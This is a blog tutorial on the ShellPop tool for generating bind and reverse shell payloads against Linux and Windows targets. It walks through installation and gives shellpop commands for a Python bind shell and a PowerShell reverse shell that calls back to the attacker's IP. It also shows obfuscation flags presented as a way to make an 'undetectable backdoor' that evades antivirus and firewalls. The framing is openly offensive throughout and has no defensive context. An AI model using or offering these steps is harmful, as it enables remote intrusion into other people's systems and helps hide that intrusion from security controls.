by hash3liZer . 18 September 2018
Delivering a successful exploit against any target OS requires a payload which gives the attacker access to the remote system and shellpop is all about that. It provides various obfuscation tweaks to bypass AV's and firewalls. It's always a pain to get a successful shell on a target especially bypassing firewalls is one of the many major problems. Shellpop makes all that easy for us.
It's all about popping stealthy shells i.e. terminal, cmd, PowerShell etc. It comes up with both bind and reverse shells for Windows and Linux OS. Since both are widely accepted and used, this left us with a large audience.
Bind and Reverse Shells:
A backdoor is maintained by opening a remote connection to or from the target machine. One of the target or victim machine is required to provide a handler for the other machine for connecting back option.
Bind shells are those shells which open up a connection at some given port on the target machine and upon successful execution, attacker connects to that connection
There are chances that the target system is protected from some sort of firewall or some AV has been installed on the system that could stop the payload from opening a connection. Reverse shells can help with such situations. In this case, a handler is spawned by the attacker on his own machine and the victim connects with the attacker.
Both has pros and cons depending on the situation. For example, if you are attacking a server which is directly connected to the Internet, you probably want to use bind shell while if the target is a machine behind NAT or a firewall, reverse shells are much useful.
Update and install the dependencies:
$ sudo apt-get update $ apt-get install python-argcomplete metasploit-framework -y
Clone shellpop from GitHub and and install:
$ git clone https://github.com/0x00-0x00/ShellPop.git $ cd ShellPop && pip install -r requirements.txt $ pip setup.py install #Install ShellPop
Next you have to choose the payload for your target. To see the list of available payloads, write the command argument --payload and press Tab key.
$ shellpop --payload [TAB Key]
Let our target be a Linux OS on some VPS. Since, the server is directly connected to internet, we can use a bind payload. Narrowing the search for required environment:
$ shellpop --payload linux/bind/[TAB Key]
We are left with a few payloads. From this list, we surely will prefer tcp over udp since udp is connection less protcol. Normally, the listed programs, i.e. python, php are normally installed in linux systems. So, let's choose python for the payload type:
$ shellpop --payload linux/bind/tcp/python
To generate the payload, an ip and port is required on which the connection will be binded. Further, a handler will be setup for handling connect back or connect to options.
$ shellpop --bind --payload linux/bind/tcp/python --port 6877 --handler \ --clip
Now, all i've to do is execute this payload on target machine.
Reverse Shell for windows:
Let's consider another scenario where the user is on Windows and is behind NAT (Network Address Translation), i.e. have private ip address and is not directly accessable to outer world. In this case, we could generate reverse powershell payload:
$ shellpop --reverse --payload windows/reverse/tcp/powershell --host [YOUR IP] --port 6877 \ --handler --clip
Remember, if it is in LAN, you can use your private IP but in WAN, you have to use public ip and setup port forwarding on your router, so that the traffic from the router is passed to your device. Since port forwarding is another pain in the butt, you can buy a VPS for 5$ from DigitalOcean.
Now, you have to somehow execute the payload on the target machine. It could be done manually, through a vulnerable application logic, file upload or a vulnerable parameter etc. Skipping this part for you to make it up your way. On successful execution, we will get the shell using the handler. Here's the handler for linux bind shell after the i executed the payload on target machine:
The generated payload was a very simple one and can easily be detected by a firewall. ShellPop provides encoding and simple obfuscation techniques to overcome such situations. Given encoders are:
--xor Enable XOR obfuscation --base64 Encode command in base64. --urlencode Encode the command in URL encoding.
You can also obfuscate the payload to a small percentage. For example, to generate an undetectable backdoor:
$ shellpop --bind --payload linux/bind/tcp/python --port 6877 --handler \ --clip --xor --ipfuscate --obfuscate-small
There's always a better way of popping shells on a target machine. Shells can be of two type i.e. bind and reverse shells. Bind shells are only meaningful on target side while reverse shells are meaningful on attacker side. Though the main purpose is to bind a shell and open a connection to another machine, a backdoor. Sometimes firewalls detect the malicious payload and hence stop the further execution. Obfuscating the payload could sometimes help bypassing these firewalls.